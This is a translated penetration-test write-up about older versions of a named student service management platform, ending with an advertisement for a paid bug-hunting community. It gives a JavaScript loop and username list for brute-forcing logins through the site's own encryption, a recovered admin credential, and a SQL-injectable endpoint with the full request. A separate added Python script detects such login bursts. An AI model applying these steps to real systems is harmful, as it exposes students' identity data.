This article only analyses a case involving vulnerabilities encountered during a real penetration test; do not use it for illegal purposes. The vulnerability exists only in older versions of the student service management platform; if it cannot be exploited, the system has already had the upgrade patch package installed.
First, we meet the login form.
After entering a username and password and clicking Login, a login request like the following is captured:
The request path is /log_in and the body is a single encrypted parameter, param (param is what distinguishes the old version from the new one: if username and password are sent as separate parameters, this vulnerability cannot be exploited).
The param value is obviously encrypted, but the encryption and decryption routines live in the front-end JavaScript.
Reading the system's JS, loginbar.js shows that the parameter is encrypted with the function xs_strEnccs, and that the plaintext format is: 'username='+username+'&password='+password+'&rootsrc=3'
Following the call chain further, xs_strEnccs in turn calls the strEnc method, while the function that decrypts the parameter is named xs_strDec.
Pause here for a moment and click "forgot password", which redirects to another page.
On that page the strEnc method can be found, and it turns out to be the decryption method for the encryption method seen earlier.
At this point the complete encrypt/decrypt pair is understood. There is no captcha on the login form either, so a list of candidate usernames with the default password 123456 can be constructed for a weak-password brute force. For example:
username=xxx&password=123456&rootsrc=3
Then call the site's own encryption function directly in the browser console and print the encrypted param for each candidate:
const usernames = ["admin", "test", "test01", "test1", "test2", "weblogic", "ftp", "manager", "manage", "user", "guest", "administrator",
"account", "super", "superuser", "master", "imap", "memcached", "mongodb", "oracle", "pop3", "postgresql", "rdp",
"redis", "smb", "smtp", "sqlserver", "ssh", "svn", "telnet", "tomcat", "vnc", "xiaomi", "huawei", "apple", "topsec",
"360", "qihoo", "1688", "aliyun", "alipay", "www", "web", "webadmin", "webmaster", "anonymous", "jboss", "1", "admin1",
"root", "sever", "system", "develop", "developer", "developers", "development", "demo", "device", "devserver", "devsql",
"0", "01", "02", "03", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "3", "3com", "4", "5",
"6", "7", "8", "9", "ILMI", "a", "zhangwei", "wangwei", "wangfang", "liwei", "lina", "zhangmin", "lijing", "wangjing",
"liuwei", "wangxiuying", "zhangli", "lixiuying", "wangli", "zhangjing", "zhangxiuying", "liqiang", "wangmin", "limin",
"wanglei", "liuyang", "wangyan", "wangyong", "lijun", "zhangyong", "lijie", "zhangjie", "zhanglei", "wangqiang", "lijuan",
"wangjun", "zhangyan", "zhangtao", "wangtao", "liyan", "wangchao", "liming", "liyong", "wangjuan", "liujie", "liumin", "lixia",
"lili", "zhangjun", "wangjie", "zhangqiang", "wangxiulan", "wanggang", "wangping", "liufang", "liuyan", "liujun", "liping",
"wanghui", "chenjing", "liuyong", "liling", "liguiying", "wangdan", "ligang", "lidan", "wangpeng", "liutao", "chenwei",
"zhanghua", "liujing", "litao", "wangguiying", "zhangxiulan", "lihong", "lichao", "liuli", "zhangguiying", "wangyulan",
"zhangpeng", "lixiulan", "zhangchao", "wangling", "zhangling", "lihua", "wangfei", "zhangyulan", "wangguilan", "wangying",
"liuqiang", "chenxiuying", "liying", "lihui", "limei", "chenyong", "wang", "lifang", "zhangguilan", "libo", "yangyong",
"wangxia", "liguilan", "wangbin", "lipeng", "zhangping", "zhanghui", "zhangyu", "liuju", "xujing", "yanghong", "yangziwen", "zhangshulan", "zhangwen", "chenguilan", "zhouli", "lishuhua", "chen", "machao",
"liujianguo", "liguihua", "wangfenglan", "lishulan", "chenxiuzhen"
];
// Encrypt each candidate with the site's own xs_strEnccs and print the resulting param
for (let i = 0; i < usernames.length; i++) {
    const result = 'username=' + usernames[i] + '&password=123456&rootsrc=3';
    const result2 = xs_strEnccs(result);
    console.log(result2);
}
Then forward the captured login request to Burp's Intruder and substitute the encrypted values for the brute force.
A response status code of 537 indicates a successful login; the param at that point is
2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B
Decrypting it gives the weak credential:
webmaster/123456
However, logging in directly with webmaster/123456 returns an error, because the request is missing the rootsrc=3 parameter.
So capture the login request, replace the param in it with 2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B, and forward it; the login then succeeds normally.
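From the defender's side, the weakness above is a login endpoint with no captcha or rate limiting, so the attack leaves an obvious trace: many POSTs to /log_in from one client in a short window, and for this platform a 537 response marking the successful guess. The following Python script is an added example, not code from the original post or the platform; it parses combined-format access logs (constructed sample lines below) and flags that pattern. The 20-per-minute threshold and the log format are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/log_in"    # login endpoint from the post
SUCCESS_STATUS = 537      # the platform's own "login succeeded" code, as reported in the post
TS_FMT = "%d/%b/%Y:%H:%M:%S"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^ \]]+) [^\]]*\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse(line):
    """Parse one combined-format access-log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"])

def find_login_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Flag clients whose POST /log_in count in any sliding window reaches threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            per_ip[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end, (ts, status) in enumerate(events):
            while ts - events[start][0] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                a = alerts.setdefault(ip, {"attempts": 0, "success_after_burst": False})
                a["attempts"] = max(a["attempts"], count)
                if status == SUCCESS_STATUS:      # a guess succeeded during the burst
                    a["success_after_burst"] = True
    return alerts

def build_sample_log():
    """Constructed sample (not real traffic): 40 attempts in 40 s, the last one 537, plus a normal client."""
    base = datetime(2023, 11, 12, 10, 0, 0)
    fmt = '{ip} - - [{ts} +0800] "POST {path} HTTP/1.1" {status} 412'
    def line(ip, offset, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return fmt.format(ip=ip, ts=ts, path=LOGIN_PATH, status=status)
    burst = [line("203.0.113.7", i, SUCCESS_STATUS if i == 39 else 200) for i in range(40)]
    normal = [line("198.51.100.4", 5 * i, 200) for i in range(2)]
    return burst + normal
```

An alert with success_after_burst set is the one to escalate: it means a credential was guessed, so the account (here webmaster) needs its password reset and its session invalidated, not just the source blocked.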
Logged in as webmaster, we are in the admin back end.
Every student's student ID and national ID number can be obtained here; the next step is hunting for vulnerabilities in the back end.
After logging in as webmaster, a back-end endpoint with SQL injection can be found (it is accessible only to administrators; a test student account cannot reach it):
GET /taglib/DroplistControl.jsp?classname=1&flag=databook HTTP/1.1
Host: xxxx
sec-ch-ua-platform: "Windows"
Connection: keep-alive
Accept: */*
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
Cookie: JSESSIONID=BDBE5E5377D3F5FC827DA999BB63F65F
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
The classname parameter is injectable.
Going through the JS again, a JSP build of the Ueditor component also turns up.
The path is buried fairly deep, under the /ueditor143/jsp directory.
Request the following address to test whether the upload whitelist allows anything useful:
/ueditor143/jsp/controller.jsp?action=uploadfile&encode=utf-8
No file types such as xml are in the allowed list, so file-upload XSS cannot be exploited; all that remains is to check whether previously uploaded files contain sensitive information.
Bonus at the end of the article
0x01 About the community
The community contains tutorials that systematically cover vulnerability hunting from the basics through to real-world practice, including the team's own collected hunting tips and case studies. It also contains shared penetration-testing experience, SRC vulnerability cases, code audits, bug-hunting approaches and other high-value resources.
A complete beginner's course in vulnerability hunting that builds your foundations from zero
Taking you step by step into bug hunting!
●The guild course is split into five parts, each of which is posted in the guild as practical notes.
●The notes start from the vulnerability principle and, combined with real-world cases, analyse how each vulnerability is found and what causes it.
A look at some of the past notes
0x02 Exclusive services
1. Internal network-security attack/defence material, CTF competition information, bug-hunting tools and practice-range resources;
2. Topical updates with small tips and real cases from vulnerability hunting;
3. Attack/defence mind maps to start learning network security from zero;
4. Quick questions and discussion on any technical problem you run into;
5. Internal CTF experts, overseas SRC hunters and the group owner answering online;
6. Organising teams to take part in SRC hunting events;
0x03 Team chat group
0x04 Guild technical guarantee
Guild leader: chobits02
●Leader of the "安全渗透感知大家族"
●Founder of the Code4th security team
●Senior security expert with 2 years of network-security experience and 1.5 years of back-end development experience
●Extensive experience in SRC hunting, incident response, security operations and network attack/defence
0x05 How to join
FreeBuf知识大陆 is celebrating its 2nd anniversary
Lifetime membership now for 49.9 yuan!
A rare discount, scan the QR code to join
Join now and you could also win a copy of Black Myth: Wukong
Scan the QR code below to enter the draw~
END
Follow the Code4th security team
for more security content~
Originally published on the WeChat public account (Code4th安全团队): 渗透实战指南 - 青果软件学生服务管理平台